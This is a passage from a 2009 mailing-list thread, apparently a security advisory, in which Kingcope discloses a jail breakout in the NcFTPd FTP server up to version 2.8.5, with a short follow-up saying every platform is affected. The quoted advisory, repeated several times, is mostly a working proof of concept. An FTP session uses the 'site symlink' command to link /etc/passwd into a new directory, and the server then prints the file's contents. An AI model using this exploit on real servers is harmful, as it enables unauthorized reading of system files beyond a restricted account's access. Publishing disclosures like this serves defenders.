> 250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
> 250-smmsp:*:25:25:Sendmail Submission
> User:/var/spool/clientmqueue:/usr/sbin/nologin
> 250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/no=
login
> 250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
> 250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologi=
n
> 250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
> 250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
> 250-uucp:*:66:66:UUCP
> pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
> 250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
> 250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
> 250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
> 250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
> 250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
> 250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
> 250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
> 250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
> 250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
> 250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/no=
login
> 250-test:*:1003:1003:test:/home/test:/bin/sh
> 250-+testx:*:::::/bin/sh
> 250
> ftp>
>
> +on freebsd you can symlink directories like =B4/=B4
>
> Cheerio,
>
> Kingcope
>


From: Kingcope kcope2@googlemail.com
Sent: Mon 27. Jul 2009 21:50
Hello list.
Just to clarify the NcFTPd vulnerability affects all operating systems
that NcFTPd runs on,
not just FreeBSD.

Cheers,

kcope



2009/7/27 Kingcope <kcope2@googlemail.com>:
> NcFTPd <=3D 2.8.5 remote jail breakout
>
> Discovered by:
> =A0 =A0 =A0 =A0Kingcope
> =A0 =A0 =A0 =A0Contact: kcope2<at>googlemail.com / http://isowarez.de
>
> Date:
> =A0 =A0 =A0 =A027th July 2009
>
> Greetings:
> =A0 =A0 =A0 =A0Alex,Andi,Adize,wY!,Netspy,Revoguard
>
> Prerequisites:
> =A0 =A0 =A0 =A0Valid user account.
>
> Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):
>
> # ftp 192.168.2.5
> Connected to 192.168.2.5.
> 220 localhost NcFTPd Server (unregistered copy) ready.
> Name (192.168.2.5:root): kcope
> 331 User kcope okay, need password.
> Password:
> 230-You are user #1 of 50 simultaneous users allowed.
> 230-
> 230 Restricted user logged in.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> get /etc/passwd passwd
> local: passwd remote: /etc/passwd
> 502 Unimplemented command.
> 227 Entering Passive Mode (192,168,2,5,219,171)
> 550 No such file.
> ftp> ls ..
> 227 Entering Passive Mode (192,168,2,5,218,102)
> 553 Permission denied.
> ftp> mkdir isowarez
> 257 "/isowarez" directory created.
> ftp> quote site symlink /etc/passwd isowarez/.message
> 250 Symlinked.
> ftp> cd isowarez
> 250-"/isowarez" is new cwd.
> 250-
> 250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks E=
xp $
> 250-#
> 250-root:*:0:0:Charlie &:/root:/bin/sh
> 250-toor:*:0:0:Bourne-again Superuser:/root:
> 250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
> 250-operator:*:2:5:System &:/:/usr/sbin/nologin
> 250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
> 250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
> 250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
> 250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
> 250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
> 250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
> 250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
> 250-smmsp:*:25:25:Sendmail Submission
> User:/var/spool/clientmqueue:/usr/sbin/nologin
> 250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/no=
login
> 250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
> 250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologi=
n
> 250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
> 250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
> 250-uucp:*:66:66:UUCP
> pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
> 250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
> 250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
> 250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
> 250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
> 250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
> 250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
> 250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
> 250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
> 250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
> 250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/no=
login
> 250-test:*:1003:1003:test:/home/test:/bin/sh
> 250-+testx:*:::::/bin/sh
> 250
> ftp>
>
> +on freebsd you can symlink directories like =B4/=B4
>
> Cheerio,
>
> Kingcope
>


From: Kingcope kcope2@googlemail.com
Sent: Mon 27. Jul 2009 21:50
Hello list.
Just to clarify the NcFTPd vulnerability affects all operating systems
that NcFTPd runs on,
not just FreeBSD.

Cheers,

kcope



2009/7/27 Kingcope <kcope2@googlemail.com>:
> NcFTPd <=3D 2.8.5 remote jail breakout
>
> Discovered by:
> =A0 =A0 =A0 =A0Kingcope
> =A0 =A0 =A0 =A0Contact: kcope2<at>googlemail.com / http://isowarez.de
>
> Date:
> =A0 =A0 =A0 =A027th July 2009
>
> Greetings:
> =A0 =A0 =A0 =A0Alex,Andi,Adize,wY!,Netspy,Revoguard
>
> Prerequisites:
> =A0 =A0 =A0 =A0Valid user account.
>
> Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):
>
> # ftp 192.168.2.5
> Connected to 192.168.2.5.
> 220 localhost NcFTPd Server (unregistered copy) ready.
> Name (192.168.2.5:root): kcope
> 331 User kcope okay, need password.
> Password:
> 230-You are user #1 of 50 simultaneous users allowed.
> 230-
> 230 Restricted user logged in.
> Remote system type is UNIX.
> Using binary mode to transfer files.
> ftp> get /etc/passwd passwd
> local: passwd remote: /etc/passwd
> 502 Unimplemented command.
> 227 Entering Passive Mode (192,168,2,5,219,171)
> 550 No such file.
> ftp> ls ..
> 227 Entering Passive Mode (192,168,2,5,218,102)
> 553 Permission denied.
> ftp> mkdir isowarez
> 257 "/isowarez" directory created.
> ftp> quote site symlink /etc/passwd isowarez/.message
> 250 Symlinked.
> ftp> cd isowarez
> 250-"/isowarez" is new cwd.
> 250-
> 250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks E=
xp $
> 250-#
> 250-root:*:0:0:Charlie &:/root:/bin/sh
> 250-toor:*:0:0:Bourne-again Superuser:/root:
> 250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
> 250-operator:*:2:5:System &:/:/usr/sbin/nologin
> 250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
> 250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
> 250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
> 250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
> 250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
> 250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
> 250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
> 250-smmsp:*:25:25:Sendmail Submission
> User:/var/spool/clientmqueue:/usr/sbin/nologin
> 250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/no=
login
> 250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
> 250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologi=
n
> 250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
> 250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
> 250-uucp:*:66:66:UUCP
> pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
> 250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
> 250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
> 250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
> 250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
> 250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
> 250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
> 250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
> 250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
> 250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
> 250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/no=
login
> 250-test:*:1003:1003:test:/home/test:/bin/sh
> 250-+testx:*:::::/bin/sh
> 250
> ftp>
>
> +on freebsd you can symlink directories like =B4/=B4
>
> Cheerio,
>
> Kingcope
>